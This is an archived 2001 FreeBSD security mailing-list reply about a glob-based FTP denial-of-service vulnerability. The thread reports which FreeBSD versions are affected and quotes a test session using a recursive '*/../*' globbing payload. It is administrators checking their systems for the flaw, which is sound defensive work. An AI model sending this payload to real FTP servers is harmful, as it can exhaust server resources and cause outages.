Date: Thu, 15 Mar 2001 18:14:53 -0500 From: Mike Tancsa <mike@sentex.net> To: freebsd-security@FreeBSD.ORG Subject: Re: Multiple vendors FTP denial of service (fwd) Message-ID: <4.2.2.20010315181354.02a035d0@marble.sentex.net> In-Reply-To: <200103152250.TAA16613@ns1.via-net-works.net.ar> References: <Pine.BSO.4.33.0103152116530.26292-100000@k2.jozsef.kando.hu>
next in thread | previous in thread | raw e-mail | index | archive | help
4.1 from Aug 10th is hurt by it.
---Mike
At 07:50 PM 3/15/2001 -0300, Fernando Schapachnik wrote:
>En un mensaje anterior, Attila Nagy escribió:
> >
> > FreeBSD isn't listed, but also vulnerable, at least with the FTPd in
> > -STABLE.
>
>Sure?
>
>With 4.2-REL:
>
>Remote system type is UNIX.
>Using binary mode to transfer files.
>ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
>150 Opening ASCII mode data connection for '/bin/ls'.
>226 Transfer complete.
>ftp>
>ftp> ls
>150 Opening ASCII mode data connection for '/bin/ls'.
>total 13
>-rw-r--r-- 1 fpscha wheel 628 27 dic 10:38 .cshrc
>drwx------ 2 fpscha wheel 512 29 dic 13:17 .elm
>-rw------- 1 fpscha wheel 1517 20 feb 09:28 .history
>-rw-r--r-- 1 fpscha wheel 299 27 dic 10:38 .login
>
>[Everything normal, I mean]
>
>
>Regards.
>
>Fernando P. Schapachnik
>Administración de la red
>VIA NET.WORKS ARGENTINA S.A.
>fschapachnik@vianetworks.com.ar
>Conmutador: (54-11) 4323-3333 - Soporte: 0810-333-AYUDA
>
>To Unsubscribe: send mail to majordomo@FreeBSD.org
>with "unsubscribe freebsd-security" in the body of the message
--------------------------------------------------------------------
Mike Tancsa, tel +1 519 651 3400
Network Administration, mike@sentex.net
Sentex Communications www.sentex.net
Cambridge, Ontario Canada www.sentex.net/mike
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?4.2.2.20010315181354.02a035d0>